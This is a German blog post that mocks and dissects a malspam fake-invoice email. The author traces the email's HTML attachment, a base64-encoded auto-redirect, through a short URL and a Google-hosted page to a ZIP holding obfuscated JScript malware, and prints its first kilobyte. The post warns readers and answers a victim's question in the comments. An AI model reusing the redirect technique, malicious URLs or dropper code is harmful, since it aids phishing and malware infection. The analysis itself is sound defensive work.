Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022, 16:33 Uhr

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

4 Kommentare für Ihre Rechnung 146648577349 von der Böttcher AG

  1. Carolin sagt:

    Moin! Leider habe ich zu schnell auf den Anhang geklickt, dann aber sofort den Download abgebrochen, der Balken war erst zur Hälfte „voll“ – kann der „Virus“ trotzdem auf meinem Rechner gelandet sein? Was kann ich tun, um ihn zu erkennen? Mein Virusprogramm hat bisher nichts gefunden. Nach was für einem Zeitraum passiert üblicherweise was? Ganz herzlichen Dank für eine schnelle Rückmeldung (bevor schlimmeres passiert)…

    • […] sofort den Download abgebrochen, der Balken war erst zur Hälfte „voll“ – kann der „Virus“ trotzdem auf meinem Rechner gelandet sein?

      Mit sehr hoher Wahrscheinlichkeit nicht. Ausgeführt werden muss der kriminelle Müll schon, und dafür muss er erstmal entpackt und dann geklickt werden. Nach vollständigem Download. Da führt sich nichts von allein aus. Der hier vorgesehene Weg ist: Ein ZIP wird heruntergeladen, klick-klick entpackt, da liegt ein Programm drin, das für ein Dokument gehalten wird, und das wird klick-klick ausgeführt. Erst danach steht ein Computer anderer Leute auf dem Schreibtisch.

      Manchmal muss man auch Glück haben. Jetzt aber schnell wieder den schöneren Dingen im Internet zuwenden. 🍀

      Zum Erkennen, wenn du ganz sicher gehen möchtest: Es gibt bootfähige ISO-Images diverser Antivirus-Hersteller oder Desinfec‘t vom Heise-Verlag. Die kannst du dir mit einem Hilfsprogramm auf einen Speicherstick spielen (ich weiß nicht, was man dafür unter Windows verwendet) und anstelle von Windows booten.

      (Dafür musst du die Boot-Reihenfolge im BIOS ändern. Wenn das für dich „böhmische Dörfer“ sind, bitte einen Menschen, der sich auskennt. Dabei kannst du es dir auch gleich abschauen, es ist wirklich nicht schwierig. Das gleiche gilt natürlich auch für die Anfertigung eines bootfähigen Speichersticks. Auch das ist nicht schwierig, auch da kannst du jemanden bitten, wenn du dir unsicher bist, auch das kannst du dir abschauen, weil es nicht schwierig ist. So etwas ist kein Grund, sich zu schämen. Selbst ich musste die Dinge, die ich heute am Rechner kann, mal lernen…)

      So kannst du deine Festplatte mit einem Virenscan überprüfen, ohne dass das möglicherweise schon „gepwnte“ Windows dafür überhaupt gestartet wird und weiteren Schaden nimmt. So nach zwei Tagen müsste die Schadsoftware bei allen Herstellern von Antivirus-Software bekannt sein und nach dem Signatur-Update sicher erkannt werden.

      Typische moderne Verschlüsselungstrojaner der Marke „Ich habe deine Daten verschlüsselt, gib Bitcoin, oder du siehst sie nie wieder“ löschen sich allerdings selbst, wenn sie ihren Schaden angerichtet haben, und man kann dann auch nur noch das Backup zurückspielen… wenn man eins hat.

      Nach was für einem Zeitraum passiert üblicherweise was?

      Es ist schwierig, dazu eine Angabe zu machen, weil die Strategien der Kriminellen ständig wechseln. Wenn ich so ein Halunke wäre, würde ich so schnell wie möglich loslegen – also erstmal das gesamte Netzwerk nach möglicherweise anfälligen weiteren Geräten und zugreifbaren Shares durchsuchen, die anfälligen Geräte übernehmen und ansonsten im Hintergrund und möglichst unauffällig alles verschlüsseln; beginnend mit Dateien im Netzwerk, weil diese in kleineren Unternehmen meist so wichtig sein werden, dass Lösegeld bezahlt wird. Ich habe allerdings nicht die große kriminelle Erfahrung und will die auch nicht sammeln… 😉

  2. […] ein mitarbeiter klicki-klicki etwas aus einer nicht digital signierten mäjhl aufmacht. Oh, hat er? Und es hat gar nichts genützt, weil das schlangenöl nun mal gar nichts nützt? Gut, dann können die hirnhonks von der scheiß-DPA aber endlich mal damit aufhören, den leuten […]

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert